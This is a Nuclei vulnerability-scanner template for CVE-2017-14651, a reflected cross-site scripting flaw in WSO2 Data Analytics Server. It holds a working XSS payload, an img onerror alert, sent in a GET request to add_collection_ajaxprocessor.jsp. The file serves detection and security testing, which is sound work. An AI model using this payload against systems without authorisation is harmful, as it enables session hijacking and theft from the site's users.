nuclei-templates/http/cves/2017/CVE-2017-14651.yaml

50 lines
2.0 KiB
YAML

id: CVE-2017-14651
info:
name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
author: mass0ma
severity: medium
description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of WSO2 Data Analytics Server or apply the necessary security patches provided by the vendor.
reference:
- https://github.com/cybersecurityworks/Disclosed/issues/15
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265
- https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-14651
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2017-14651
cwe-id: CWE-79
epss-score: 0.00144
epss-percentile: 0.49339
cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wso2
product: api_manager
tags: cve,cve2017,wso2,xss
http:
- method: GET
path:
- "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=alert(document.domain)>"
- "Failed to add new collection"
condition: and
- type: word
part: header
words:
- "text/html"
# digest: 4a0a00473045022034f84ef006638a070852b350742ad77cd35f09148d0fbf4414429225a72f02e1022100c0814184d527fbae67d23da2ebd61e4645fa2c28e29bff5142f47a551b927bcf:922c64590222798bb761d5b6d8e72950